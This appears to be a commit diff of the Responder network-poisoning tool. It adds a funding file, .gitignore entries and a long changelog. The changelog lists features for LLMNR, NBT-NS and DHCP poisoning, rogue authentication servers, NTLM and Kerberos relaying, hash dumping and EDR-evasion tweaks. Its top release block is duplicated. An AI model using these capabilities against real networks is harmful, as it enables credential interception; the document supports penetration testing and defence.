Implemented RDNSS and DNSSL

Long overdue README update

.github/FUNDING.yml

@@ -0,0 +1,2 @@
+github: lgandx
+custom: 'https://paypal.me/PythonResponder'

.gitignore

@@ -1,5 +1,15 @@
+# Python artifacts
+*.pyc
+.venv/
+
 # Responder logs
 *.db
 *.txt
 *.log
 
+# Generated certificates and keys
+certs/*.crt
+certs/*.key
+
+# IDE
+.idea/

CHANGELOG.md

@@ -0,0 +1,713 @@
+
+n.n.n / 2025-05-22
+==================
+
+  * added check for aioquic & updated version to reflect recent changes
+  * Merge pull request #310 from ctjf/master
+  * Merge pull request #308 from BlWasp/error_code_returned
+  * Merge pull request #311 from stfnw/master
+  * DHCP poisoner: refactor FindIP
+  * added quic support based on xpn's work
+  * Indentation typos
+  * Add status code control
+  * Merge pull request #305 from L1-0/patch-1
+  * Update RPC.py
+  * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
+  * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
+
+n.n.n / 2025-05-22
+==================
+
+  * added check for aioquic & updated version to reflect recent changes
+  * Merge pull request #310 from ctjf/master
+  * Merge pull request #308 from BlWasp/error_code_returned
+  * Merge pull request #311 from stfnw/master
+  * DHCP poisoner: refactor FindIP
+  * added quic support based on xpn's work
+  * Indentation typos
+  * Add status code control
+  * Merge pull request #305 from L1-0/patch-1
+  * Update RPC.py
+  * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
+  * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
+and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
+
+<!-- insertion marker -->
+## Unreleased
+
+<small>[Compare with latest](https://github.com/lgandx/Responder/compare/v3.1.4.0...HEAD)</small>
+
+### Added
+
+- Add options for poisoners ([807bd57](https://github.com/lgandx/Responder/commit/807bd57a96337ab77f2fff50729a6eb229e5dc37) by f3rn0s).
+- Add randomness in TTL value to avoid some EDR detections ([f50f0be](https://github.com/lgandx/Responder/commit/f50f0be59c0de6fd0ff8eef62ba31db96815c878) by nodauf).
+- added support for either resolv.conf or resolvectl ([1a2f2fd](https://github.com/lgandx/Responder/commit/1a2f2fdb22a2bf8b04e0ac99219831457b7ba43a) by lgandx).
+
+### Fixed
+
+- Fixed issue with smb signing detection ([413bc8b](https://github.com/lgandx/Responder/commit/413bc8be3169d215f7d5f251a78c8d8404e52f61) by lgandx).
+- fixed minor bug ([e51f24e](https://github.com/lgandx/Responder/commit/e51f24e36c1f84bc995a690d385c506c35cc6175) by lgandx).
+- Fixed bug when IPv6 is disabled via GRUB. ([fa297c8](https://github.com/lgandx/Responder/commit/fa297c8a16f605bdb731542c67280a4d8bc023c4) by lgandx).
+
+### Removed
+
+- removed debug string ([4b560f6](https://github.com/lgandx/Responder/commit/4b560f6e17493dcfc6bf653d0ebe0547a88735ac) by lgandx).
+- removed bowser listener ([e564e51](https://github.com/lgandx/Responder/commit/e564e5159b9a1bfe3c5f1101b3ab11672e0fd46b) by lgandx).
+
+<!-- insertion marker -->
+## [v3.1.4.0](https://github.com/lgandx/Responder/releases/tag/v3.1.4.0) - 2024-01-04
+
+<small>[Compare with v3.1.3.0](https://github.com/lgandx/Responder/compare/v3.1.3.0...v3.1.4.0)</small>
+
+### Added
+
+- added LDAPS listener ([6d61f04](https://github.com/lgandx/Responder/commit/6d61f0439c1779767c9ea9840ac433ed98e672cd) by exploide).
+- added:error handling on exceptions. ([f670fba](https://github.com/lgandx/Responder/commit/f670fbaa7fcd3b072aef7cf29f43c1d76d6f13bf) by lgandx).
+- Added full path to gen-self-sign-cert.sh ([69f431e](https://github.com/lgandx/Responder/commit/69f431e58f07c231e75a73b0782855e9277573ac) by kevintellier).
+- add flag (-s) to enable smbv1scan ([cf0c4ee](https://github.com/lgandx/Responder/commit/cf0c4ee659779c027374155716f09b13cb41abb5) by requin).
+- add hostname on smbv2 scan result ([709df2c](https://github.com/lgandx/Responder/commit/709df2c6e18ec2fa6647fdaaa4d9f9e2cb7920f8) by requin).
+- Added dump by legacy protocols ([b8818ed](https://github.com/lgandx/Responder/commit/b8818ed0c47d9d615c4ba1dcff99e8d2d98296d5) by lgandx).
+- added requirements.txt ([00d9d27](https://github.com/lgandx/Responder/commit/00d9d27089d8f02658b08f596d28d1722c276d57) by lgandx).
+- Added: append .local TLD to DontRespondToNames + MDNS bug fix ([0bc226b](https://github.com/lgandx/Responder/commit/0bc226b4beaa84eb3ac26f5d563959ccf567262b) by lgandx).
+- Added Quiet mode ([2cd66a9](https://github.com/lgandx/Responder/commit/2cd66a9b92aa6ca2b7fba0fea03b0a285c186683) by jb).
+
+### Fixed
+
+- Fixed issue in http srv, more hashes & signature reduction. ([66ee7f8](https://github.com/lgandx/Responder/commit/66ee7f8f08f57926f5b3694ffb9e87619eee576f) by lgandx).
+- fixed a TypeError in MSSQLBrowser ([20cdd9c](https://github.com/lgandx/Responder/commit/20cdd9c7c23e620e3d530f76003b94407882e9cd) by exploide).
+- fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+ ([e9bd8a4](https://github.com/lgandx/Responder/commit/e9bd8a43ef353a03ba9195236a3aa5faf3788faa) by exploide).
+- fixed minor bug on py 3.10 ([31393c7](https://github.com/lgandx/Responder/commit/31393c70726206fc1056f76ef6b81a981d7954c5) by lgandx).
+- fixed HTTP basic auth parsing when password contains colons ([dc33d1f](https://github.com/lgandx/Responder/commit/dc33d1f858e9bbc58ae8edf030dbfee208d748f1) by exploide).
+- Fixing soft failure which results in missed SMTP credential interception ([34603ae](https://github.com/lgandx/Responder/commit/34603aed0aadfe3c3625ea729cbc9dc0f06e7e73) by Syntricks).
+- Fixing collections import issue for /tools/MultiRelay/odict.py ([aa8d818](https://github.com/lgandx/Responder/commit/aa8d81861bcdfc3dbf253b617ec044fd4807e9d4) by Shutdown).
+- Fixing import issue like in /tools/odict.py ([2c4cadb](https://github.com/lgandx/Responder/commit/2c4cadbf7dec6e26ec2494a0cfde38655f5bebaf) by Shutdown).
+- fix typo of ServerTlype ([0c80b76](https://github.com/lgandx/Responder/commit/0c80b76f5758dfae86bf4924a49b29c31e2e77f8) by deltronzero).
+- Fixed potential disruption on Proxy-Auth ([c51251d](https://github.com/lgandx/Responder/commit/c51251db5ff311743238b1675d52edb7c6849f00) by lgandx).
+- fixed the RespondTo/DontRespondTo issue ([2765ef4](https://github.com/lgandx/Responder/commit/2765ef4e668bc3493924aae5032e3ec63078ac42) by lgandx).
+
+### Removed
+
+- removed patreon donation link. ([700b7d6](https://github.com/lgandx/Responder/commit/700b7d6222afe3c1d6fb17a0a522e1166e6ad025) by lgandx).
+- removed useless string ([08e44d7](https://github.com/lgandx/Responder/commit/08e44d72acd563910c153749b3c204ce0304bdd1) by lgandx).
+- removed debug ([4ea3d7b](https://github.com/lgandx/Responder/commit/4ea3d7b76554dee5160aaf76a0235074590284f8) by lgandx).
+- Removed Patreon link ([8e12d2b](https://github.com/lgandx/Responder/commit/8e12d2bcfe11cc23e35ea678b9e4979856183d0e) by lgandx).
+- Removed machine accounts dump, since they are not crackable ([c9b5dd0](https://github.com/lgandx/Responder/commit/c9b5dd040e27de95638b33da7a35e5187efb4aac) by lgandx).
+
+## [v3.1.3.0](https://github.com/lgandx/Responder/releases/tag/v3.1.3.0) - 2022-07-26
+
+<small>[Compare with v3.1.2.0](https://github.com/lgandx/Responder/compare/v3.1.2.0...v3.1.3.0)</small>
+
+### Fixed
+
+- Fixed: Warnings on python 3.10 ([9b1c99c](https://github.com/lgandx/Responder/commit/9b1c99ccd29890496b0194c061266997e28be4c0) by lgandx).
+- Fix missing paren error ([0c7a3ff](https://github.com/lgandx/Responder/commit/0c7a3ffabeee77cb9f3d960168a357e9583b2f9f) by cweedon).
+- Fix double logging of first hash or cleartext ([e7eb3bc](https://github.com/lgandx/Responder/commit/e7eb3bcce85c5d437082214c0e8044919cccee56) by Gustaf Blomqvist).
+
+### Removed
+
+- removed -r reference from help msg. ([983a1c6](https://github.com/lgandx/Responder/commit/983a1c6576cb7dfe6cabea93e56dc4f2c557621b) by lgandx).
+- removed -r references ([03fa9a7](https://github.com/lgandx/Responder/commit/03fa9a7187c80586629c58a297d0d78f2f8da559) by lgandx).
+
+## [v3.1.2.0](https://github.com/lgandx/Responder/releases/tag/v3.1.2.0) - 2022-02-12
+
+<small>[Compare with v3.1.1.0](https://github.com/lgandx/Responder/compare/v3.1.1.0...v3.1.2.0)</small>
+
+### Added
+
+- added support for OPT EDNS ([5cf6922](https://github.com/lgandx/Responder/commit/5cf69228cf5ce4c0433904ee1d05955e8fd6f618) by lgandx).
+
+### Fixed
+
+- Fixed options formating in README ([f85ad77](https://github.com/lgandx/Responder/commit/f85ad77d595f5d79b86ddce843bc884f1ff4ac9e) by Andrii Nechytailov).
+
+## [v3.1.1.0](https://github.com/lgandx/Responder/releases/tag/v3.1.1.0) - 2021-12-17
+
+<small>[Compare with v3.0.9.0](https://github.com/lgandx/Responder/compare/v3.0.9.0...v3.1.1.0)</small>
+
+### Added
+
+- Added IPv6 support ([5d4510c](https://github.com/lgandx/Responder/commit/5d4510cc1d0479b13ece9d58ea60d187daf8cdab) by lgandx).
+- added: dhcp inform ([3e8c9fd](https://github.com/lgandx/Responder/commit/3e8c9fdb0eceb3eb1f7c6dbc81502b340a5ca152) by lgandx).
+- Added DHCP DNS vs DHCP WPAD ([76f6c88](https://github.com/lgandx/Responder/commit/76f6c88df31bbd59dc6dceba1b59251012e45f81) by lgandx).
+- Added DHCP DNS vs WPAD srv injection ([9dc7798](https://github.com/lgandx/Responder/commit/9dc779869b5a47fdf26cf79a727ea4a853f0d129) by lgandx).
+- Added date and time for each Responder session config log. ([bb17595](https://github.com/lgandx/Responder/commit/bb17595e3fc9fafa58c8979bebc395ed872ef598) by lgandx).
+
+### Removed
+
+- removed fingerprint.py ([0b56d6a](https://github.com/lgandx/Responder/commit/0b56d6aaeb00406b364cf152b258365393d64ccc) by lgandx).
+
+## [v3.0.9.0](https://github.com/lgandx/Responder/releases/tag/v3.0.9.0) - 2021-12-10
+
+<small>[Compare with v3.0.8.0](https://github.com/lgandx/Responder/compare/v3.0.8.0...v3.0.9.0)</small>
+
+### Added
+
+- added the ability to provide external IP on WPAD poison via DHCP ([ba885b9](https://github.com/lgandx/Responder/commit/ba885b9345024809555d1a2c1f8cc463870602bb) by lgandx).
+- Added a check for MSSQL ([5680487](https://github.com/lgandx/Responder/commit/568048710f0cf5c04c53fd8e026fdd1b3f5c16e6) by lgandx).
+
+### Fixed
+
+- Fixed the ON/OFF for poisoners when in Analyze mode. ([3cd5140](https://github.com/lgandx/Responder/commit/3cd5140c800d8f4e9e8547e4137cafe33fc2f066) by lgandx).
+
+### Removed
+
+- Remove analyze mode on DNS since you need to ARP to get queries ([17e62bd](https://github.com/lgandx/Responder/commit/17e62bda1aed4884c1f08e514faba8c1e39b36ad) by lgandx).
+
+## [v3.0.8.0](https://github.com/lgandx/Responder/releases/tag/v3.0.8.0) - 2021-12-03
+
+<small>[Compare with v3.0.7.0](https://github.com/lgandx/Responder/compare/v3.0.7.0...v3.0.8.0)</small>
+
+### Added
+
+- Added DB for RunFinger results & Report ([f90b76f](https://github.com/lgandx/Responder/commit/f90b76fed202ee4a6e17a030151c8de4430717a8) by lgandx).
+- added timeout option for fine tuning ([a462d1d](https://github.com/lgandx/Responder/commit/a462d1df061b214eebcabdbe3f95caa5dd8ea3c7) by lgandx).
+- added DHCP db & updated the report script to reflect that ([1dfa997](https://github.com/lgandx/Responder/commit/1dfa997da8c0fa1e51a1be30b2a3d5f5d92f4b7f) by lgandx).
+- Added support for single IP or range file. ([02fb3f8](https://github.com/lgandx/Responder/commit/02fb3f8978286a486d633a707889ea8992a7f43a) by lgandx).
+
+### Fixed
+
+- fix: DHCP now working on VPN interface ([88a2c6a](https://github.com/lgandx/Responder/commit/88a2c6a53b721da995fbbd8e5cd82fb40d4af268) by lgandx).
+- Fixed a bug and increased speed. ([1b2a22f](https://github.com/lgandx/Responder/commit/1b2a22facfd54820cc5f8ebba06f5cd996e917dc) by lgandx).
+
+### Removed
+
+- Removed old DHCP script since its now a Responder module. ([d425783](https://github.com/lgandx/Responder/commit/d425783be994b0d2518633e4b93e13e305685e5b) by lgandx).
+- removed default certs ([de778f6](https://github.com/lgandx/Responder/commit/de778f66982817f1149408bc2e080371d3d4a71d) by lgandx).
+- Removed the static certs and added automatic cert generation ([21afd35](https://github.com/lgandx/Responder/commit/21afd357f828b586cfa96992c8c978024285b162) by lgandx).
+- removed debug str ([826b5af](https://github.com/lgandx/Responder/commit/826b5af9e2e37d50afdd3eb3ee66121e6c81c2a2) by lgandx).
+
+## [v3.0.7.0](https://github.com/lgandx/Responder/releases/tag/v3.0.7.0) - 2021-10-26
+
+<small>[Compare with v3.0.6.0](https://github.com/lgandx/Responder/compare/v3.0.6.0...v3.0.7.0)</small>
+
+### Added
+
+- Added DHCP server ([c449b6b](https://github.com/lgandx/Responder/commit/c449b6bcb990959e352967b3842b09978b9b2729) by lgandx).
+- Add --lm switch for ESS downgrade ([dcb80d9](https://github.com/lgandx/Responder/commit/dcb80d992e385a0f0fdd3f724a0b040a42439306) by Pixis).
+- Add ESS disabling information ([51f8ab4](https://github.com/lgandx/Responder/commit/51f8ab43682973df32534ca97c99fb1318a0c77d) by Pixis).
+- Add ESS downgrade parameter ([baf80aa](https://github.com/lgandx/Responder/commit/baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516) by pixis).
+
+### Fixed
+
+- fixed minor isse ([350058c](https://github.com/lgandx/Responder/commit/350058c1795e43c23950b6bd23c33f45795ec7cc) by lgandx).
+
+## [v3.0.6.0](https://github.com/lgandx/Responder/releases/tag/v3.0.6.0) - 2021-04-19
+
+<small>[Compare with v3.0.5.0](https://github.com/lgandx/Responder/compare/v3.0.5.0...v3.0.6.0)</small>
+
+### Added
+
+- Added WinRM rogue server ([8531544](https://github.com/lgandx/Responder/commit/85315442bd010dd61fcb62de8d6ca9cc969426ba) by lgandx).
+
+## [v3.0.5.0](https://github.com/lgandx/Responder/releases/tag/v3.0.5.0) - 2021-04-17
+
+<small>[Compare with v3.0.4.0](https://github.com/lgandx/Responder/compare/v3.0.4.0...v3.0.5.0)</small>
+
+### Added
+
+- Added dce-rpc module + enhancements + bug fix. ([e91e37c](https://github.com/lgandx/Responder/commit/e91e37c9749f58330e0d68ce062a48b100a2d09e) by lgandx).
+
+### Removed
+
+- removed addiontional RR on SRV answers ([027e6b9](https://github.com/lgandx/Responder/commit/027e6b95c3ca89367cb5123758c2fc29aba27a59) by lgandx).
+
+## [v3.0.4.0](https://github.com/lgandx/Responder/releases/tag/v3.0.4.0) - 2021-04-12
+
+<small>[Compare with v3.0.3.0](https://github.com/lgandx/Responder/compare/v3.0.3.0...v3.0.4.0)</small>
+
+### Added
+
+- Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping ([1271b8e](https://github.com/lgandx/Responder/commit/1271b8e17983bd3969d951ce2b4c9b75600f94b9) by lgandx).
+- added a check for exec file ([cc3a5b5](https://github.com/lgandx/Responder/commit/cc3a5b5cfffbb8e7430030aa66a2981feae7fe85) by lgandx).
+- Added donation banner. ([8104139](https://github.com/lgandx/Responder/commit/8104139a3535a49caf7ec0ed64e8e33ea686494f) by lgandx).
+- added donation address and minor typo ([06f9f91](https://github.com/lgandx/Responder/commit/06f9f91f118b0729a74d3c1810a493886655e6f1) by lgandx).
+- added smb filetime support ([b0f044f](https://github.com/lgandx/Responder/commit/b0f044fe4e710597ae73e6f1af87ea246b0cd365) by lgandx).
+
+### Removed
+
+- removed FindSMB2UPTime.py since RunFinger already get this info ([6c51080](https://github.com/lgandx/Responder/commit/6c51080109fd8c9305021336c0dc8c72e01b5541) by lgandx).
+- Removed MultiRelay binaries ([35b12b4](https://github.com/lgandx/Responder/commit/35b12b48323b1960960aba916334635d5a590875) by lgandx).
+- Removed BindShell executable file ([5d762c4](https://github.com/lgandx/Responder/commit/5d762c4a550f2c578f4d7874f24563240276852d) by lgandx).
+- Removed donation banner ([ccee87a](https://github.com/lgandx/Responder/commit/ccee87aa95f2ec16827592ba9d98c4895cec0cb9) by lgandx).
+- removed verification ([dd1a674](https://github.com/lgandx/Responder/commit/dd1a67408081c94490a3263c46b2eb0b6107e542) by lgandx).
+
+## [v3.0.3.0](https://github.com/lgandx/Responder/releases/tag/v3.0.3.0) - 2021-02-08
+
+<small>[Compare with v3.0.2.0](https://github.com/lgandx/Responder/compare/v3.0.2.0...v3.0.3.0)</small>
+
+### Added
+
+- Added support for SMB2 signing ([24e7b7c](https://github.com/lgandx/Responder/commit/24e7b7c667c3c9feb1cd3a25b16bd8d9c2df5ec6) by lgandx).
+- Added SMB2 support for RunFinger and various other checks. ([e24792d](https://github.com/lgandx/Responder/commit/e24792d7743dbf3a5c5ffac92113e36e5d682e42) by lgandx).
+
+### Fixed
+
+- Fix wrong syntax ([fb10d20](https://github.com/lgandx/Responder/commit/fb10d20ea387448ad084a57f5f4441c908fc53cc) by Khiem Doan).
+- fix custom challenge in python3 ([7b47c8f](https://github.com/lgandx/Responder/commit/7b47c8fe4edcb53b035465985d92500b96fb1a84) by ThePirateWhoSmellsOfSunflowers).
+- Fix typos in README ([12b796a](https://github.com/lgandx/Responder/commit/12b796a292b87be15ef8eec31cb276c447b9e8c8) by Laban Sköllermark).
+
+## [v3.0.2.0](https://github.com/lgandx/Responder/releases/tag/v3.0.2.0) - 2020-09-28
+
+<small>[Compare with v3.0.1.0](https://github.com/lgandx/Responder/compare/v3.0.1.0...v3.0.2.0)</small>
+
+### Fixed
+
+- Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface ([af7d27a](https://github.com/lgandx/Responder/commit/af7d27ac8cb3c2b0664a8b0a11940c0f3c25c891) by lgandx).
+
+## [v3.0.1.0](https://github.com/lgandx/Responder/releases/tag/v3.0.1.0) - 2020-08-19
+
+<small>[Compare with v3.0.0.0](https://github.com/lgandx/Responder/compare/v3.0.0.0...v3.0.1.0)</small>
+
+### Added
+
+- Added DNSUpdate.py, a small script to add DNS record to DC for gatering from different VLANs ([05617de](https://github.com/lgandx/Responder/commit/05617defefcd6954915d0b42d73d4ccfcccad2d4) by Sagar-Jangam).
+
+### Fixed
+
+- Fix encoding issue in Python 3 ([7420f62](https://github.com/lgandx/Responder/commit/7420f620825d5a5ae6dc68364a5680910f7f0512) by Sophie Brun).
+
+## [v3.0.0.0](https://github.com/lgandx/Responder/releases/tag/v3.0.0.0) - 2020-01-09
+
+<small>[Compare with v2.3.4.0](https://github.com/lgandx/Responder/compare/v2.3.4.0...v3.0.0.0)</small>
+
+### Added
+
+- Added py3 and py2 compatibility + many bugfix ([b510b2b](https://github.com/lgandx/Responder/commit/b510b2bb2523a3fe24953ac685e697914a60b26c) by lgandx).
+
+## [v2.3.4.0](https://github.com/lgandx/Responder/releases/tag/v2.3.4.0) - 2019-08-17
+
+<small>[Compare with v2.3.3.9](https://github.com/lgandx/Responder/compare/v2.3.3.9...v2.3.4.0)</small>
+
+### Added
+
+- Added RDP rogue server ([c52843a](https://github.com/lgandx/Responder/commit/c52843a5359a143c5a94a74c095d6ac4679cd4b1) by lgandx).
+- Added proper changes to RunFinger (and is not checking for MS17-010 straight away) ([105502e](https://github.com/lgandx/Responder/commit/105502edd401615604e09a9a71a268252c82523d) by Paul A).
+
+### Fixed
+
+- Fix socket timeout on HTTP POST requests ([e7a787c](https://github.com/lgandx/Responder/commit/e7a787cbc4e01e92be6e062e94211dca644fae0c) by Crypt0-M3lon).
+- fixed minor bugfix on recent merge ([38e721d](https://github.com/lgandx/Responder/commit/38e721da9826b95ed3599151559e8f8c535e4d6e) by lgandx).
+- Fix multi HTTP responses ([defabfa](https://github.com/lgandx/Responder/commit/defabfa543f0b567d7e981003c7a00d7f02c3a16) by Clément Notin).
+- Fix version number in settings.py ([621c5a3](https://github.com/lgandx/Responder/commit/621c5a3c125646c14db19fc48f30e4075102c929) by Clément Notin).
+- Fixed some small typos in MS17-010 output ([daaf6f7](https://github.com/lgandx/Responder/commit/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc) by Chris Maddalena).
+
+### Removed
+
+- removed debug string ([47e63ae](https://github.com/lgandx/Responder/commit/47e63ae4ec3266a35845d0bf116cf17fa0d17fd7) by lgandx).
+
+## [v2.3.3.9](https://github.com/lgandx/Responder/releases/tag/v2.3.3.9) - 2017-11-20
+
+<small>[Compare with v2.3.3.8](https://github.com/lgandx/Responder/compare/v2.3.3.8...v2.3.3.9)</small>
+
+### Added
+
+- Added: check for null sessions and MS17-010 ([b37f562](https://github.com/lgandx/Responder/commit/b37f56264a6b57faff81c12a8143662bf1ddb91d) by lgandx).
+- Add ignore case on check body for html inject ([47c3115](https://github.com/lgandx/Responder/commit/47c311553eb38327622d5e6b25e20a662c31c30d) by Lionel PRAT).
+- added support for plain auth ([207b0d4](https://github.com/lgandx/Responder/commit/207b0d455c95a5cd68fbfbbc022e5cc3cb41878f) by lgandx).
+
+## [v2.3.3.8](https://github.com/lgandx/Responder/releases/tag/v2.3.3.8) - 2017-09-05
+
+<small>[Compare with v2.3.3.7](https://github.com/lgandx/Responder/compare/v2.3.3.7...v2.3.3.8)</small>
+
+### Changed
+
+- Changed the complete LDAP parsing hash algo (ntlmv2 bug). ([679cf65](https://github.com/lgandx/Responder/commit/679cf65cff0c537b594d284cd01e2ea9c690d4ae) by lgandx).
+
+## [v2.3.3.7](https://github.com/lgandx/Responder/releases/tag/v2.3.3.7) - 2017-09-05
+
+<small>[Compare with v2.3.3.6](https://github.com/lgandx/Responder/compare/v2.3.3.6...v2.3.3.7)</small>
+
+### Added
+
+- Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 ([5859c31](https://github.com/lgandx/Responder/commit/5859c31e8ecf35c5b12ac653e8ab793bc9270604) by Matt Kelly).
+- Add Microsoft SQL Server Browser responder ([bff935e](https://github.com/lgandx/Responder/commit/bff935e71ea401a4477004022623b1617ac090b3) by Matthew Daley).
+- added: mimi32 cmd,  MultiRelay random RPC & Namedpipe & latest mimikatz ([38219e2](https://github.com/lgandx/Responder/commit/38219e249e700c1b20317e0b96f4a120fdfafb98) by lgandx).
+
+### Fixed
+
+- Fixed various bugs and improved the LDAP module. ([be26b50](https://github.com/lgandx/Responder/commit/be26b504b5133c78158d9794cd361ce1a7418775) by lgandx).
+- Fixed space typo in FindSMB2UPTime.py ([11c0096](https://github.com/lgandx/Responder/commit/11c00969c36b2ed51763ee6c975870b05e84cdcb) by myst404).
+- Fixed instances of "CRTL-C" to "CTRL-C" ([44a4e49](https://github.com/lgandx/Responder/commit/44a4e495ccb21098c6b882feb25e636510fc72b9) by Randy Ramos).
+
+## [v2.3.3.6](https://github.com/lgandx/Responder/releases/tag/v2.3.3.6) - 2017-03-29
+
+<small>[Compare with v2.3.3.5](https://github.com/lgandx/Responder/compare/v2.3.3.5...v2.3.3.6)</small>
+
+### Fixed
+
+- Fixed bug in FindSMB2UPTime ([6f3cc45](https://github.com/lgandx/Responder/commit/6f3cc4564c9cf34b75ef5469fd54edd4b3004b54) by lgandx).
+
+### Removed
+
+- Removed Paypal donation link. ([b05bdca](https://github.com/lgandx/Responder/commit/b05bdcab9600ad4e7ef8b70e2d8ee1b03b8b442a) by lgandx).
+
+## [v2.3.3.5](https://github.com/lgandx/Responder/releases/tag/v2.3.3.5) - 2017-02-18
+
+<small>[Compare with v2.3.3.4](https://github.com/lgandx/Responder/compare/v2.3.3.4...v2.3.3.5)</small>
+
+## [v2.3.3.4](https://github.com/lgandx/Responder/releases/tag/v2.3.3.4) - 2017-02-18
+
+<small>[Compare with v2.3.3.3](https://github.com/lgandx/Responder/compare/v2.3.3.3...v2.3.3.4)</small>
+
+### Added
+
+- Added: Hashdump, Stats report ([21d48be](https://github.com/lgandx/Responder/commit/21d48be98fd30a9fd0747588cbbb070ed0ce100b) by lgandx).
+- added `ip` commands in addition to ifconfig and netstat ([db61f24](https://github.com/lgandx/Responder/commit/db61f243c9cc3c9821703c78e780e745703c0bb3) by thejosko).
+
+### Fixed
+
+- fixed crash: typo. ([0642999](https://github.com/lgandx/Responder/commit/0642999741b02de79266c730cc262bb3345644f9) by lgandx).
+- Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string ([de6e869](https://github.com/lgandx/Responder/commit/de6e869a7981d49725e791303bd16c4159d70880) by Gifts).
+- Fix Proxy_Auth. Random challenge broke it. ([5a2ee18](https://github.com/lgandx/Responder/commit/5a2ee18bfaa66ff245747cf8afc114a9a894507c) by Timon Hackenjos).
+
+## [v2.3.3.3](https://github.com/lgandx/Responder/releases/tag/v2.3.3.3) - 2017-01-03
+
+<small>[Compare with v2.3.3.2](https://github.com/lgandx/Responder/compare/v2.3.3.2...v2.3.3.3)</small>
+
+### Added
+
+- Added: Random challenge for each requests (default) ([0d441d1](https://github.com/lgandx/Responder/commit/0d441d1899053fde6792288fc83be0c883df19f0) by lgandx).
+
+## [v2.3.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.3.2) - 2017-01-03
+
+<small>[Compare with v2.3.3.1](https://github.com/lgandx/Responder/compare/v2.3.3.1...v2.3.3.2)</small>
+
+### Added
+
+- Added: Random challenge for each requests (default) ([1d38cd3](https://github.com/lgandx/Responder/commit/1d38cd39af9154f5a9e898428de25fe0afa68d2f) by lgandx).
+- Added paypal button ([17dc81c](https://github.com/lgandx/Responder/commit/17dc81cb6833a91300d0669398974f0ed9bc006e) by lgandx).
+- Added: Scripting support. -c and -d command line switch ([ab2d890](https://github.com/lgandx/Responder/commit/ab2d8907f033384e593a38073e50604a834f4bf3) by lgandx).
+- Added: BTC donation address ([730808c](https://github.com/lgandx/Responder/commit/730808c83c0c7f67370ceeff977b0e727eb28ea4) by lgandx).
+
+### Removed
+
+- Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones. ([4a7499d](https://github.com/lgandx/Responder/commit/4a7499df039269094c718eb9e19760e79eea86f7) by lgandx).
+
+## [v2.3.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.3.1) - 2016-10-18
+
+<small>[Compare with v2.3.3.0](https://github.com/lgandx/Responder/compare/v2.3.3.0...v2.3.3.1)</small>
+
+### Added
+
+- Added: Logs dumped files for multiple targets ([d560105](https://github.com/lgandx/Responder/commit/d5601056b386a7ae3ca167f0562cbe87bf004c38) by lgandx).
+
+### Fixed
+
+- Fixed wrong challenge issue ([027f841](https://github.com/lgandx/Responder/commit/027f841cdf11fd0ad129825dcc70d6ac8b5d3983) by lgandx).
+
+## [v2.3.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.3.0) - 2016-10-12
+
+<small>[Compare with v2.3.2.8](https://github.com/lgandx/Responder/compare/v2.3.2.8...v2.3.3.0)</small>
+
+### Added
+
+- Added: Compability for Multi-Relay ([5b06173](https://github.com/lgandx/Responder/commit/5b0617361ede8df67caad4ca89723ad18a67fa53) by lgandx).
+
+### Fixed
+
+- Fix values for win98 and win10 (requested here: https://github.com/lgandx/Responder/pull/7/commits/d9d34f04cddbd666865089d809eb5b3d46dd9cd4) ([60c91c6](https://github.com/lgandx/Responder/commit/60c91c662607c3991cb760c7dd221e81cfb69518) by lgandx).
+- Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6) ([ce211f7](https://github.com/lgandx/Responder/commit/ce211f7fcfa7ea9e3431161fec5075ca63730070) by lgandx).
+- fixed bug in hash parsing. ([0cf1087](https://github.com/lgandx/Responder/commit/0cf1087010088ef1c3fecc7d2ad851c7c49d0639) by lgandx).
+
+### Changed
+
+- Changed to executable ([3e46ecd](https://github.com/lgandx/Responder/commit/3e46ecd27e53c58c3dc38888a2db1d3340a5a3ab) by lgandx).
+
+## [v2.3.2.8](https://github.com/lgandx/Responder/releases/tag/v2.3.2.8) - 2016-10-06
+
+<small>[Compare with v2.3.2.7](https://github.com/lgandx/Responder/compare/v2.3.2.7...v2.3.2.8)</small>
+
+### Added
+
+- Added: Now delete services on the fly. ([c6e401c](https://github.com/lgandx/Responder/commit/c6e401c2290fbb6c68bbc396915ea3fa7b11b5f0) by lgandx).
+
+## [v2.3.2.7](https://github.com/lgandx/Responder/releases/tag/v2.3.2.7) - 2016-10-05
+
+<small>[Compare with v2.3.2.6](https://github.com/lgandx/Responder/compare/v2.3.2.6...v2.3.2.7)</small>
+
+### Added
+
+- Added: Possibility to target all users. use 'ALL' with -u ([d81ef9c](https://github.com/lgandx/Responder/commit/d81ef9c33ab710f973c68f60cd0b7960f9e4841b) by lgandx).
+
+### Fixed
+
+- Fixed minor bug ([7054c60](https://github.com/lgandx/Responder/commit/7054c60f38cafc7e1c4d8a6ce39e12afbfc8b482) by lgandx).
+
+## [v2.3.2.6](https://github.com/lgandx/Responder/releases/tag/v2.3.2.6) - 2016-10-05
+
+<small>[Compare with v2.3.2.5](https://github.com/lgandx/Responder/compare/v2.3.2.5...v2.3.2.6)</small>
+
+## [v2.3.2.5](https://github.com/lgandx/Responder/releases/tag/v2.3.2.5) - 2016-10-03
+
+<small>[Compare with v2.3.2.4](https://github.com/lgandx/Responder/compare/v2.3.2.4...v2.3.2.5)</small>
+
+### Added
+
+- Added logs folder. ([cd09e19](https://github.com/lgandx/Responder/commit/cd09e19a9363867a75d7db1dea4830969bc0d68e) by lgandx).
+- Added: Cross-protocol NTLMv1-2 relay (beta). ([ab67070](https://github.com/lgandx/Responder/commit/ab67070a2b82e94f2abb506a69f8fa8c0dc09852) by lgandx).
+
+### Removed
+
